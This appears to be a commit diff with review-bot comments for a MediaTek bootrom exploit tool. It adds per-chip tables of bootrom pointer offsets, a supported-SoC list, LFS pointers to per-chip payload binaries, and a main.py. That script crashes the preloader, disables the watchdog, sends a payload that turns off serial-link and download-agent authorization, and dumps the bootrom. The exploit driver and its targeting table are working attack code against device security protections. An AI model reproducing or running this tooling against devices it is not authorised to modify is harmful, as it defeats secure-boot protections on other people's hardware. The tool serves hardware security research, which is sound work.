+ "ptr_usbdl": 0x978c,
138
+ "ptr_da": 0x9c28,
139
+ },
140
+
141
+ "0x279": { // mt6797
142
+ "payload": "mt6797_payload.bin",
143
+ "ptr_usbdl": 0x9eac,
144
+ "ptr_da": 0xa354,
145
+ },
146
+
147
+ "0x816": { // mt6885
148
+ "payload": "mt6885_payload.bin",
149
+ "ptr_usbdl": 0xe6b8,
150
+ "ptr_da": 0xebbc,
151
+ },
152
+
153
+ "0x8127": { // mt8127
154
+ "payload": "mt8127_payload.bin",
155
+ "ptr_usbdl": 0xb2b8,
156
+ "ptr_da": 0xb740,
157
+ },
158
+
159
+ "0x8163": { // mt8163
160
+ "var_1": 0xB1,
161
+ "payload": "mt8163_payload.bin",
162
+ "ptr_usbdl": 0xc12c,
163
+ "ptr_da": 0xc5c8,
164
+ },
165
+
166
+ "0x8167": { // mt8516
167
+ "var_1": 0xCC,
168
+ "payload": "mt8167_payload.bin",
169
+ "ptr_usbdl": 0xd2e4,
170
+ "ptr_da": 0xd7ac,
171
+ },
172
+
173
+ "0x8172": { // mt8173
174
+ "payload": "mt8173_payload.bin",
175
+ "payload_address": 0x120A00,
176
+ "ptr_usbdl": 0xa0e4,
177
+ "ptr_da": 0xa580,
178
+ },
179
+
180
+ "0x8695": { // mt8695
181
+ "payload": "mt8695_payload.bin",
182
+ "ptr_usbdl": 0xbeec,
183
+ "ptr_da": 0xc3f8,
184
+ },
185
+
186
+ "0x886": { // mt6873
187
+ "payload": "mt6873_payload.bin",
188
+ "ptr_usbdl": 0xea78,
189
+ "ptr_da": 0xef38,
190
+ },
191
+
192
+ "0x562": { // mt6799
193
+ "watchdog_address": 0x10211000,
194
+ "payload": "mt6799_payload.bin",
195
+ "ptr_usbdl": 0xf5ac,
196
+ "ptr_da": 0xfa78,
197
+ },
198
+
199
+ "0x989": { // mt6833
200
+ "payload": "mt6833_payload.bin",
201
+ "ptr_usbdl": 0xdfe0,
202
+ "ptr_da": 0xe4a0,
203
+ },
204
+
205
+ "0x996": { // mt6853
206
+ "payload": "mt6853_payload.bin",
207
+ "ptr_usbdl": 0xea64,
208
+ "ptr_da": 0xef24,
209
+ },
210
+
211
+ "0x8590": { // mt8590
212
+ "payload": "mt8590_payload.bin",
213
+ "ptr_usbdl": 0xbbe4,
214
+ "ptr_da": 0xc06c,
215
+ },
216
+ }
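Review bot: The table has no entry whose comment names mt6750, yet exploits_collection/README.md in this commit lists mt6750 as supported and mt6750_payload.bin is shipped, so the two disagree about whether that SoC is handled; main.py is outside this view, so I cannot tell what happens on an unknown hw code. If mt6750 reports the same hw code as an existing entry (0x326/mt6755 is one plausible candidate), say so in that entry's comment — `"0x326": { // mt6755 / mt6750 (same hw code)` — and drop the unused payload; otherwise either add an entry whose `ptr_usbdl`/`ptr_da` were taken from that bootrom or remove mt6750 from the README list. Separately, `"0x8167": { // mt8516` labels the entry with a different SoC than the `mt8167_payload.bin` it selects; if both parts share hw code 0x8167, make the comment `// mt8167 / mt8516 (same hw code)`, otherwise correct it. The `0x766` entry is also the only one without a trailing comma after `ptr_da`, which is legal json5 but inconsistent with the rest of the table.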
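--- a/exploits_collection/README.md
+++ b/exploits_collection/README.md
@@ -0,0 +1,34 @@
+### Supported SoCs
+- mt6261
+- mt6572
+- mt6580
+- mt6582
+- mt6592
+- mt6595
+- mt6735
+- mt6737
+- mt6739
+- mt6750
+- mt6753
+- mt6755
+- mt6757
+- mt6761
+- mt6763
+- mt6765
+- mt6768
+- mt6771
+- mt6779
+- mt6785
+- mt6795
+- mt6797
+- mt6799
+- mt6833
+- mt6853
+- mt6873
+- mt6885
+- mt8127
+- mt8163
+- mt8167
+- mt8173
+- mt8590
+- mt8695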
exploits_collection/default_config.json5 ADDED
@@ -0,0 +1,216 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "0x6261": { // mt6261
3
+ "payload": "mt6261_payload.bin",
4
+ "var_1": 0x28,
5
+ "watchdog_address": 0xA0030000,
6
+ },
7
+
8
+ "0x6572": { // mt6572
9
+ "payload": "mt6572_payload.bin",
10
+ "payload_address": 0x10036A0,
11
+ "ptr_usbdl": 0x40ba68,
12
+ "ptr_da": 0x40befc,
13
+ },
14
+
15
+ "0x6580": { // mt6580
16
+ "payload": "mt6580_payload.bin",
17
+ "var_1": 0xAC,
18
+ "ptr_usbdl": 0xb60c,
19
+ "ptr_da": 0xba94,
20
+ },
21
+
22
+ "0x6582": { // mt6582
23
+ "payload": "mt6582_payload.bin",
24
+ "ptr_usbdl": 0xa5fc,
25
+ "ptr_da": 0xaa84,
26
+ },
27
+
28
+ "0x6592": { // mt6592
29
+ "payload": "mt6592_payload.bin",
30
+ "ptr_usbdl": 0xa564,
31
+ "ptr_da": 0xa9ec,
32
+ },
33
+
34
+ "0x6595": { // mt6595
35
+ "payload": "mt6595_payload.bin",
36
+ "ptr_usbdl": 0xb218,
37
+ "ptr_da": 0xb6a0,
38
+ },
39
+
40
+ "0x321": { // mt6735
41
+ "watchdog_address": 0x10212000,
42
+ "var_0": 0x10,
43
+ "var_1": 0x28,
44
+ "payload": "mt6735_payload.bin",
45
+ "ptr_usbdl": 0x95f8,
46
+ "ptr_da": 0x9a94,
47
+ },
48
+
49
+ "0x335": { // mt6737
50
+ "watchdog_address": 0x10212000,
51
+ "var_0": 0x10,
52
+ "var_1": 0x28,
53
+ "payload": "mt6737_payload.bin",
54
+ "ptr_usbdl": 0x9608,
55
+ "ptr_da": 0x9aa4,
56
+ },
57
+
58
+ "0x699": { // mt6739
59
+ "var_0": 0x20,
60
+ "var_1": 0xB4,
61
+ "payload": "mt6739_payload.bin",
62
+ "ptr_usbdl": 0xdf1c,
63
+ "ptr_da": 0xe3e8,
64
+ },
65
+
66
+ "0x337": { // mt6753
67
+ "watchdog_address": 0x10212000,
68
+ "var_1": 0x28,
69
+ "payload": "mt6753_payload.bin",
70
+ "ptr_usbdl": 0x9668,
71
+ "ptr_da": 0x9b04,
72
+ },
73
+
74
+ "0x326": { // mt6755
75
+ "payload": "mt6755_payload.bin",
76
+ "ptr_usbdl": 0x9a6c,
77
+ "ptr_da": 0x9f14,
78
+ },
79
+
80
+ "0x551": { // mt6757
81
+ "payload": "mt6757_payload.bin",
82
+ "ptr_usbdl": 0x9c2c,
83
+ "ptr_da": 0xa0e8,
84
+ },
85
+
86
+ "0x717": { // mt6761
87
+ "var_1": 0x25,
88
+ "payload": "mt6761_payload.bin",
89
+ "ptr_usbdl": 0xbc8c,
90
+ "ptr_da": 0xc158,
91
+ },
92
+
93
+ "0x690": { // mt6763
94
+ "var_1": 0x7F,
95
+ "payload": "mt6763_payload.bin",
96
+ "ptr_usbdl": 0xd66c,
97
+ "ptr_da": 0xdb38,
98
+ },
99
+
100
+ "0x766": { // mt6765
101
+ "var_0": 0x2C,
102
+ "var_1": 0x25,
103
+ "payload": "mt6765_payload.bin",
104
+ "ptr_usbdl": 0xbdc0,
105
+ "ptr_da": 0xc28c
106
+ },
107
+
108
+ "0x707": { // mt6768
109
+ "var_0": 0x2C,
110
+ "var_1": 0x25,
111
+ "payload": "mt6768_payload.bin",
112
+ "ptr_usbdl": 0xc190,
113
+ "ptr_da": 0xc650,
114
+ },
115
+
116
+ "0x788": { // mt6771
117
+ "var_0": 0x20,
118
+ "payload": "mt6771_payload.bin",
119
+ "ptr_usbdl": 0xdebc,
120
+ "ptr_da": 0xe388,
121
+ },
122
+
123
+ "0x725": { // mt6779
124
+ "payload": "mt6779_payload.bin",
125
+ "ptr_usbdl": 0xe04c,
126
+ "ptr_da": 0xe50c,
127
+ },
128
+
129
+ "0x813": { // mt6785
130
+ "payload": "mt6785_payload.bin",
131
+ "ptr_usbdl": 0xe2a4,
132
+ "ptr_da": 0xe764,
133
+ },
134
+
135
+ "0x6795": { // mt6795
136
+ "payload": "mt6795_payload.bin",
137
+ "ptr_usbdl": 0x978c,
138
+ "ptr_da": 0x9c28,
139
+ },
140
+
141
+ "0x279": { // mt6797
142
+ "payload": "mt6797_payload.bin",
143
+ "ptr_usbdl": 0x9eac,
144
+ "ptr_da": 0xa354,
145
+ },
146
+
147
+ "0x816": { // mt6885
148
+ "payload": "mt6885_payload.bin",
149
+ "ptr_usbdl": 0xe6b8,
150
+ "ptr_da": 0xebbc,
151
+ },
152
+
153
+ "0x8127": { // mt8127
154
+ "payload": "mt8127_payload.bin",
155
+ "ptr_usbdl": 0xb2b8,
156
+ "ptr_da": 0xb740,
157
+ },
158
+
159
+ "0x8163": { // mt8163
160
+ "var_1": 0xB1,
161
+ "payload": "mt8163_payload.bin",
162
+ "ptr_usbdl": 0xc12c,
163
+ "ptr_da": 0xc5c8,
164
+ },
165
+
166
+ "0x8167": { // mt8516
167
+ "var_1": 0xCC,
168
+ "payload": "mt8167_payload.bin",
169
+ "ptr_usbdl": 0xd2e4,
170
+ "ptr_da": 0xd7ac,
171
+ },
172
+
173
+ "0x8172": { // mt8173
174
+ "payload": "mt8173_payload.bin",
175
+ "payload_address": 0x120A00,
176
+ "ptr_usbdl": 0xa0e4,
177
+ "ptr_da": 0xa580,
178
+ },
179
+
180
+ "0x8695": { // mt8695
181
+ "payload": "mt8695_payload.bin",
182
+ "ptr_usbdl": 0xbeec,
183
+ "ptr_da": 0xc3f8,
184
+ },
185
+
186
+ "0x886": { // mt6873
187
+ "payload": "mt6873_payload.bin",
188
+ "ptr_usbdl": 0xea78,
189
+ "ptr_da": 0xef38,
190
+ },
191
+
192
+ "0x562": { // mt6799
193
+ "watchdog_address": 0x10211000,
194
+ "payload": "mt6799_payload.bin",
195
+ "ptr_usbdl": 0xf5ac,
196
+ "ptr_da": 0xfa78,
197
+ },
198
+
199
+ "0x989": { // mt6833
200
+ "payload": "mt6833_payload.bin",
201
+ "ptr_usbdl": 0xdfe0,
202
+ "ptr_da": 0xe4a0,
203
+ },
204
+
205
+ "0x996": { // mt6853
206
+ "payload": "mt6853_payload.bin",
207
+ "ptr_usbdl": 0xea64,
208
+ "ptr_da": 0xef24,
209
+ },
210
+
211
+ "0x8590": { // mt8590
212
+ "payload": "mt8590_payload.bin",
213
+ "ptr_usbdl": 0xbbe4,
214
+ "ptr_da": 0xc06c,
215
+ },
216
+ }
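Review bot: This is the same 216-line table as the top-level default_config.json5 added in the same commit, and nothing in the visible files says which copy main.py loads, so the two will drift silently the first time only one of them is edited. I would keep a single copy — delete this one, or delete the top-level one and have the tool reference `exploits_collection/default_config.json5` explicitly (main.py is outside this view, so I cannot tell which path it currently opens). Whichever copy survives inherits the same gaps: no entry for the mt6750 the README lists, and the `"0x8167": { // mt8516` comment naming a different SoC than the `mt8167_payload.bin` it selects.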
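--- a/exploits_collection/payloads/generic_dump_payload.bin
+++ b/exploits_collection/payloads/generic_dump_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5fdceec17aad68669b214dd65caa45a2b889b897936b77803e2f466a348af349
+size 296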
exploits_collection/payloads/generic_loader_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:e887a930a9477ab9a1e56b05b31bb5a58bed30664045338d97f7fe6dc71d3f54
3
+ size 64
exploits_collection/payloads/generic_reboot_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:f9c276cb23bc626753286de8b1ff96df5e4b25be3f59bbcf3a8032ac439fe108
3
+ size 48
exploits_collection/payloads/generic_uart_dump_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:bcc29db220226c4b900ddbf94023c6f3c3342ce705c26e3493502251238e4b32
3
+ size 312
exploits_collection/payloads/mt6261_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6c55ce771f424d46fbb9af5ebab73dc35ce272365ca9eb443370b27bc3e31ff7
3
+ size 596
exploits_collection/payloads/mt6572_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:512dd5d09e4a34836b24e6caaa130d5209136a1759b1ef1be3dec9721bf04ccc
3
+ size 600
exploits_collection/payloads/mt6580_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:8ded7dfcad11bf60ee0e57b38d56e0ff7ccc8a6780c45fd9d8239ec8df53ba79
3
+ size 600
exploits_collection/payloads/mt6582_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d65304bbcd3ee0b1c60dfaa706a183d5b3b29e8db62418d660855752289594d2
3
+ size 600
exploits_collection/payloads/mt6592_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:1d44e6cc8eb8d17c95a5b19ab5c951728ed39a6ea5b3e50b1df720df8649a9b4
3
+ size 600
exploits_collection/payloads/mt6595_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d7a7363ed2b75a6796c94c6ade0c39a2838c00b7d5cf1e14a6ddcf607eb73634
3
+ size 600
exploits_collection/payloads/mt6735_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:5a845468619f58aa108236cd2e048374a374a0bf833b05969ffbdf2ca0bb662b
3
+ size 600
exploits_collection/payloads/mt6737_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:5b6efe0b5af21699007cd9eb47b88bdd800fd19d6ff70d65dceedd61ee7137e5
3
+ size 600
exploits_collection/payloads/mt6739_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d372011cd5c72d94c635a1197c30b24716a8a4611f478888d4264004308ef9d2
3
+ size 612
exploits_collection/payloads/mt6750_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:4f952d41829f28b9ad88c0389c719a10c0942eb02ef32d3fe72f3c7fb7bd5f4e
3
+ size 684
exploits_collection/payloads/mt6753_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ca48914ab40ce2fde63841b7651855c98477a5a93a79e6afc18c4b81d572b206
3
+ size 600
exploits_collection/payloads/mt6755_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:fa86a785a0bcf8468285c8922f931a94a2b23dcc93098b3281e5d52f28387262
3
+ size 600
exploits_collection/payloads/mt6757_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:c27f4b5d4b33c7bfd42d84927371041deb45f195797ebf371d7f713c93f90f57
3
+ size 600
exploits_collection/payloads/mt6761_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:f0d4f402ecdd17244d96db79e81bbbb4569a093ef0d97709d3cad7d7a5e85ab0
3
+ size 612
exploits_collection/payloads/mt6763_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:c193fa0c493f90471b23c3a89b339b4523df9cb15e6d9b1e24a749121522cffb
3
+ size 612
exploits_collection/payloads/mt6765_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:da9d34f8d56cc943683620eb79fc48b73872c6cb7e85454c50585fa68b496f46
3
+ size 612
exploits_collection/payloads/mt6768_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:8d812ae251c0b6294b8fc180169bd070e5d42b8e54a371cf14e635e4c3cc8302
3
+ size 612
exploits_collection/payloads/mt6771_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:7488880d5df691aa5fab26128a5632b8921350c31baeb43421735d8e03756bc7
3
+ size 612
exploits_collection/payloads/mt6779_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:02d95a77511902028a07df411ff51b869fad477b608d612368378f77607fff76
3
+ size 612
exploits_collection/payloads/mt6785_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:f0d47794bb84406ffd0c74a104f8d3237c5393859316b5712d8ce7c20fae4f3c
3
+ size 612
exploits_collection/payloads/mt6795_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:956b3b4c2643b38c39f1f1241cadd308def77c28c13940ecfe427e40130f59f2
3
+ size 600
exploits_collection/payloads/mt6797_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:e15b2acc3d2fae7b9dab5676cccbb610f1533eeffbf45ddba37777f7a8c6fe8b
3
+ size 600
exploits_collection/payloads/mt6799_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:a4604277287a3032f12651a1294c65c30367adece683220462ee4a2ad8148207
3
+ size 612
exploits_collection/payloads/mt6833_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:878f45230dc7433b45df93b141c34d2cf36f5fe6ac2f9c4e31be0c54d169b5de
3
+ size 612
exploits_collection/payloads/mt6853_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:0b98563fe19acc5f33af489603bce6678831a7d8674d73ecf2931abffea24a5d
3
+ size 612
exploits_collection/payloads/mt6873_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:657f7789d5997f439ef1ec7595675d48c08b8d08e0581b3776e166a85f8fa819
3
+ size 612
exploits_collection/payloads/mt6885_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:2a363f1175ec09660ba94b6b5bdbe506e044c4696eae43c3dfe2b1bef13c7440
3
+ size 612
exploits_collection/payloads/mt8127_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:372a67d80b5cca43858deed4f44e82f4c7a69faa0a28f8c1fa90fc8fe88de59f
3
+ size 600
exploits_collection/payloads/mt8163_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:450676f55daf21f1f6e1c733fa6d8c31b0d2b88598f203fc1e1a5282ffc4995e
3
+ size 600
exploits_collection/payloads/mt8167_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ad6bf2b8f10554671715cc1fd27dcae86f6608d6af86b0686c7c5b9669b19a51
3
+ size 612
exploits_collection/payloads/mt8173_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:bc65b5184d97098cafcc431454e0549bbdb8e7d5b4f6148800c46343c218faf6
3
+ size 600
exploits_collection/payloads/mt8590_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:2d5fcc0f926684beb5c9558beecf29ac0f9b1244fdc701fee7ad0a6af3de39c8
3
+ size 600
exploits_collection/payloads/mt8695_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:01653e6daf12d14014a2d3cae9fc2cab8afb34727228197fba09fce70eca035a
3
+ size 592
libusb-1.0.dll ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6b24b0ee1a59cbae385dd15b06eddf2c72b2ff3a875ae279883a880136c59ec8
3
+ size 166912
main.py ADDED
@@ -0,0 +1,237 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/bin/python3
2
+
3
+ from src.exploit import exploit
4
+ from src.common import from_bytes, to_bytes
5
+ from src.config import Config
6
+ from src.device import Device
7
+ from src.logger import log
8
+ from src.bruteforce import bruteforce
9
+
10
+ import argparse
11
+ import os
12
+
13
+ DEFAULT_CONFIG = "exploits_collection/default_config.json5"
14
+ PAYLOAD_DIR = "exploits_collection/payloads/"
15
+ DEFAULT_PAYLOAD = "generic_dump_payload.bin"
16
+ DEFAULT_DA_ADDRESS = 0x200D00
17
+
18
+
19
+ def main():
20
+ parser = argparse.ArgumentParser()
21
+ parser.add_argument("-c", "--config", help="Device config")
22
+ parser.add_argument("-t", "--test", help="Testmode", const="0x9900", nargs='?')
23
+ parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)")
24
+ parser.add_argument("-u", "--uart", help="UART base address(in hex)")
25
+ parser.add_argument("-v", "--var_1", help="var_1 value(in hex)")
26
+ parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)")
27
+ parser.add_argument("-p", "--payload", help="Payload to use")
28
+ parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true")
29
+ parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true")
30
+ parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int)
31
+ parser.add_argument("-k", "--kamakiri", help="Force use of kamakiri", action="store_true")
32
+ arguments = parser.parse_args()
33
+
34
+ if arguments.config:
35
+ if not os.path.exists(arguments.config):
36
+ raise RuntimeError("Config file {} doesn't exist".format(arguments.config))
37
+ elif not os.path.exists(DEFAULT_CONFIG):
38
+ raise RuntimeError("Default config is missing")
39
+
40
+ device = Device().find()
41
+
42
+ config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments)
43
+
44
+ while device.preloader:
45
+ device = crash_preloader(device, config)
46
+ config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments)
47
+
48
+ log("Disabling watchdog timer")
49
+ device.write32(config.watchdog_address, 0x22000064)
50
+
51
+ if device.libusb0:
52
+ arguments.kamakiri = True
53
+
54
+ bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin"
55
+
56
+ if arguments.test and not arguments.kamakiri:
57
+ dump_ptr = int(arguments.test, 16)
58
+ found = False
59
+ while not found:
60
+ log("Test mode, testing " + hex(dump_ptr) + "...")
61
+ found, dump_ptr = bruteforce(device, config, dump_ptr)
62
+ device.dev.close()
63
+ reconnect_message()
64
+ device = Device().find(wait=True)
65
+ device.handshake()
66
+ while device.preloader:
67
+ device = crash_preloader(device, config)
68
+ device.handshake()
69
+ log("Found " + hex(dump_ptr) + ", dumping bootrom to {}".format(bootrom__name))
70
+ open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True))
71
+ exit(0)
72
+
73
+ if serial_link_authorization or download_agent_authorization or arguments.force:
74
+ log("Disabling protection")
75
+
76
+ payload = prepare_payload(config)
77
+
78
+ result = exploit(device, config, payload, arguments)
79
+ if arguments.test:
80
+ while not result:
81
+ device.dev.close()
82
+ config.var_1 += 1
83
+ log("Test mode, testing " + hex(config.var_1) + "...")
84
+ reconnect_message()
85
+ device = Device().find(wait=True)
86
+ device.handshake()
87
+ while device.preloader:
88
+ device = crash_preloader(device, config)
89
+ device.handshake()
90
+ result = exploit(device, config, payload, arguments)
91
+ else:
92
+ log("Insecure device, sending payload using send_da")
93
+
94
+ if not arguments.payload:
95
+ config.payload = DEFAULT_PAYLOAD
96
+ if not arguments.payload_address:
97
+ config.payload_address = DEFAULT_DA_ADDRESS
98
+
99
+ payload = prepare_payload(config)
100
+
101
+ payload += b'\x00' * 0x100
102
+
103
+ device.send_da(config.payload_address, len(payload), 0x100, payload)
104
+ device.jump_da(config.payload_address)
105
+
106
+ result = device.read(4)
107
+
108
+ if result == to_bytes(0xA1A2A3A4, 4):
109
+ log("Protection disabled")
110
+ elif result == to_bytes(0xC1C2C3C4, 4):
111
+ dump_brom(device, bootrom__name)
112
+ elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4):
113
+ dump_brom(device, bootrom__name, True)
114
+ elif result != b'':
115
+ raise RuntimeError("Unexpected result {}".format(result.hex()))
116
+ else:
117
+ log("Payload did not reply")
118
+
119
+ device.close()
120
+
121
+ def reconnect_message():
122
+ print("")
123
+ print("Please reconnect device in bootrom mode")
124
+ print("")
125
+
126
+ def dump_brom(device, bootrom__name, word_mode=False):
127
+ log("Found send_dword, dumping bootrom to {}".format(bootrom__name))
128
+
129
+ with open(bootrom__name, "wb") as bootrom:
130
+ if word_mode:
131
+ for i in range(0x20000 // 4):
132
+ device.read(4) # discard garbage
133
+ bootrom.write(device.read(4))
134
+ else:
135
+ bootrom.write(device.read(0x20000))
136
+
137
+
138
+ def prepare_payload(config):
139
+ with open(PAYLOAD_DIR + config.payload, "rb") as payload:
140
+ payload = payload.read()
141
+
142
+ # replace watchdog_address and uart_base in generic payload
143
+ payload = bytearray(payload)
144
+ if from_bytes(payload[-4:], 4, '<') == 0x10007000:
145
+ payload[-4:] = to_bytes(config.watchdog_address, 4, '<')
146
+ if from_bytes(payload[-8:][:4], 4, '<') == 0x11002000:
147
+ payload[-8:] = to_bytes(config.uart_base, 4, '<') + payload[-4:]
148
+ payload = bytes(payload)
149
+
150
+ while len(payload) % 4 != 0:
151
+ payload += to_bytes(0)
152
+
153
+ return payload
154
+
155
+
156
+ def get_device_info(device, arguments):
157
+ if not arguments.no_handshake:
158
+ device.handshake()
159
+
160
+ hw_code = device.get_hw_code()
161
+ hw_sub_code, hw_ver, sw_ver = device.get_hw_dict()
162
+ secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config()
163
+
164
+ if arguments.config:
165
+ config_file = open(arguments.config)
166
+ config = Config().from_file(config_file, hw_code)
167
+ config_file.close()
168
+ else:
169
+ try:
170
+ config = Config().default(hw_code)
171
+ except NotImplementedError as e:
172
+ if arguments.test:
173
+ config = Config()
174
+
175
+ log(e)
176
+ else:
177
+ raise e
178
+
179
+ if arguments.test:
180
+ config.payload = DEFAULT_PAYLOAD
181
+ if arguments.var_1:
182
+ config.var_1 = int(arguments.var_1, 16)
183
+ if arguments.watchdog:
184
+ config.watchdog_address = int(arguments.watchdog, 16)
185
+ if arguments.uart:
186
+ config.uart_base = int(arguments.uart, 16)
187
+ if arguments.payload_address:
188
+ config.payload_address = int(arguments.payload_address, 16)
189
+ if arguments.payload:
190
+ config.payload = arguments.payload
191
+ if arguments.crash_method:
192
+ config.crash_method = arguments.crash_method
193
+
194
+
195
+ if not os.path.exists(PAYLOAD_DIR + config.payload):
196
+ raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload))
197
+
198
+ print()
199
+ log("Device hw code: {}".format(hex(hw_code)))
200
+ log("Device hw sub code: {}".format(hex(hw_sub_code)))
201
+ log("Device hw version: {}".format(hex(hw_ver)))
202
+ log("Device sw version: {}".format(hex(sw_ver)))
203
+ log("Device secure boot: {}".format(secure_boot))
204
+ log("Device serial link authorization: {}".format(serial_link_authorization))
205
+ log("Device download agent authorization: {}".format(download_agent_authorization))
206
+ print()
207
+
208
